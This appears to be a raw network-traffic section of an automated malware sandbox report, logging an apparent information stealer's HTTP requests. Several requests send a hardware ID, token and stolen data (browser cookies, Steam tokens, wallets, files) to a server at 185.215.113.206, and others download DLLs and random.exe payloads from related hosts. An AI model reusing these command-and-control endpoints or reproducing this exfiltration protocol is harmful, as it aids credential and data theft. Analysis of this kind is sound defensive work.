Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 38 37 42 37 37 30 42 43 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="hwid"3F87B770BC7F2148772887------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="build"mars------JJJKFBAAAFHJEBFIEGID--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFHIIEHIEGDHJJJKFIIHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 64 66 38 38 35 34 34 66 33 65 39 63 63 30 62 39 62 65 66 62 30 31 62 33 39 63 63 61 31 34 34 63 66 38 33 39 33 33 61 64 39 65 36 65 36 64 62 62 34 31 35 62 64 37 64 34 33 62 66 64 37 38 31 36 61 66 30 61 66 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 2d 2d 0d 0a Data Ascii: ------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="token"d3df88544f3e9cc0b9befb01b39cca144cf83933ad9e6e6dbb415bd7d43bfd7816af0af6------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="message"browsers------JKFHIIEHIEGDHJJJKFII--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 64 66 38 38 35 34 34 66 33 65 39 63 63 30 62 39 62 65 66 62 30 31 62 33 39 63 63 61 31 34 34 63 66 38 33 39 33 33 61 64 39 65 36 65 36 64 62 62 34 31 35 62 64 37 64 34 33 62 66 64 37 38 31 36 61 66 30 61 66 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="token"d3df88544f3e9cc0b9befb01b39cca144cf83933ad9e6e6dbb415bd7d43bfd7816af0af6------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="message"plugins------DAFBGHCAKKFCAKEBKJKK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHIDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 64 66 38 38 35 34 34 66 33 65 39 63 63 30 62 39 62 65 66 62 30 31 62 33 39 63 63 61 31 34 34 63 66 38 33 39 33 33 61 64 39 65 36 65 36 64 62 62 34 31 35 62 64 37 64 34 33 62 66 64 37 38 31 36 61 66 30 61 66 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 2d 2d 0d 0a Data Ascii: ------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="token"d3df88544f3e9cc0b9befb01b39cca144cf83933ad9e6e6dbb415bd7d43bfd7816af0af6------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="message"fplugins------IIEHCFIDHIDGIDHJEHID--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.206Content-Length: 6819Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 64 66 38 38 35 34 34 66 33 65 39 63 63 30 62 39 62 65 66 62 30 31 62 33 39 63 63 61 31 34 34 63 66 38 33 39 33 33 61 64 39 65 36 65 36 64 62 62 34 31 35 62 64 37 64 34 33 62 66 64 37 38 31 36 61 66 30 61 66 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="token"d3df88544f3e9cc0b9befb01b39cca144cf83933ad9e6e6dbb415bd7d43bfd7816af0af6------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------AFBFHDBKJEGHJJJKFIIJ--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCAAFBFBKFIDGDHJDBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 64 66 38 38 35 34 34 66 33 65 39 63 63 30 62 39 62 65 66 62 30 31 62 33 39 63 63 61 31 34 34 63 66 38 33 39 33 33 61 64 39 65 36 65 36 64 62 62 34 31 35 62 64 37 64 34 33 62 66 64 37 38 31 36 61 66 30 61 66 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="token"d3df88544f3e9cc0b9befb01b39cca144cf83933ad9e6e6dbb415bd7d43bfd7816af0af6------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="file"------HDGCAAFBFBKFIDGDHJDB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFBHost: 185.215.113.206Content-Length: 3083Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKKHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 64 66 38 38 35 34 34 66 33 65 39 63 63 30 62 39 62 65 66 62 30 31 62 33 39 63 63 61 31 34 34 63 66 38 33 39 33 33 61 64 39 65 36 65 36 64 62 62 34 31 35 62 64 37 64 34 33 62 66 64 37 38 31 36 61 66 30 61 66 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="token"d3df88544f3e9cc0b9befb01b39cca144cf83933ad9e6e6dbb415bd7d43bfd7816af0af6------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="file"------CGIDGCGIEGDGDGDGHJKK--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFBAKKJDBKJJJKFHDAEHost: 185.215.113.206Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 64 66 38 38 35 34 34 66 33 65 39 63 63 30 62 39 62 65 66 62 30 31 62 33 39 63 63 61 31 34 34 63 66 38 33 39 33 33 61 64 39 65 36 65 36 64 62 62 34 31 35 62 64 37 64 34 33 62 66 64 37 38 31 36 61 66 30 61 66 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 2d 2d 0d 0a Data Ascii: ------FIIEHJDBKJKECBFHDGHJContent-Disposition: form-data; name="token"d3df88544f3e9cc0b9befb01b39cca144cf83933ad9e6e6dbb415bd7d43bfd7816af0af6------FIIEHJDBKJKECBFHDGHJContent-Disposition: form-data; name="message"wallets------FIIEHJDBKJKECBFHDGHJ--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECAECFCAAEBFHIEHDGHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 64 66 38 38 35 34 34 66 33 65 39 63 63 30 62 39 62 65 66 62 30 31 62 33 39 63 63 61 31 34 34 63 66 38 33 39 33 33 61 64 39 65 36 65 36 64 62 62 34 31 35 62 64 37 64 34 33 62 66 64 37 38 31 36 61 66 30 61 66 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 2d 2d 0d 0a Data Ascii: ------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="token"d3df88544f3e9cc0b9befb01b39cca144cf83933ad9e6e6dbb415bd7d43bfd7816af0af6------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="message"files------DAECAECFCAAEBFHIEHDG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIIEHJDBKJKECBFHDGHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 64 66 38 38 35 34 34 66 33 65 39 63 63 30 62 39 62 65 66 62 30 31 62 33 39 63 63 61 31 34 34 63 66 38 33 39 33 33 61 64 39 65 36 65 36 64 62 62 34 31 35 62 64 37 64 34 33 62 66 64 37 38 31 36 61 66 30 61 66 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 2d 2d 0d 0a Data Ascii: ------CBFIIEHJDBKJKECBFHDGContent-Disposition: form-data; name="token"d3df88544f3e9cc0b9befb01b39cca144cf83933ad9e6e6dbb415bd7d43bfd7816af0af6------CBFIIEHJDBKJKECBFHDGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CBFIIEHJDBKJKECBFHDGContent-Disposition: form-data; name="file"------CBFIIEHJDBKJKECBFHDG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECFHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 64 66 38 38 35 34 34 66 33 65 39 63 63 30 62 39 62 65 66 62 30 31 62 33 39 63 63 61 31 34 34 63 66 38 33 39 33 33 61 64 39 65 36 65 36 64 62 62 34 31 35 62 64 37 64 34 33 62 66 64 37 38 31 36 61 66 30 61 66 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 2d 2d 0d 0a Data Ascii: ------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="token"d3df88544f3e9cc0b9befb01b39cca144cf83933ad9e6e6dbb415bd7d43bfd7816af0af6------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="message"ybncbhylepme------KJEGCFBGDHJJJJJKJECF--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKJKFBKKECFHJKEBKEHHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 64 66 38 38 35 34 34 66 33 65 39 63 63 30 62 39 62 65 66 62 30 31 62 33 39 63 63 61 31 34 34 63 66 38 33 39 33 33 61 64 39 65 36 65 36 64 62 62 34 31 35 62 64 37 64 34 33 62 66 64 37 38 31 36 61 66 30 61 66 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 2d 2d 0d 0a Data Ascii: ------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="token"d3df88544f3e9cc0b9befb01b39cca144cf83933ad9e6e6dbb415bd7d43bfd7816af0af6------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BKKJKFBKKECFHJKEBKEH--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 37 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005746001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Tue, 12 Nov 2024 12:24:50 GMTIf-None-Match: "67334912-1b3400"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKKEGCAAECAAAKFBGIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 38 37 42 37 37 30 42 43 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 2d 2d 0d 0a Data Ascii: ------BAKKEGCAAECAAAKFBGIEContent-Disposition: form-data; name="hwid"3F87B770BC7F2148772887------BAKKEGCAAECAAAKFBGIEContent-Disposition: form-data; name="build"mars------BAKKEGCAAECAAAKFBGIE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 37 34 37 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005747031&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
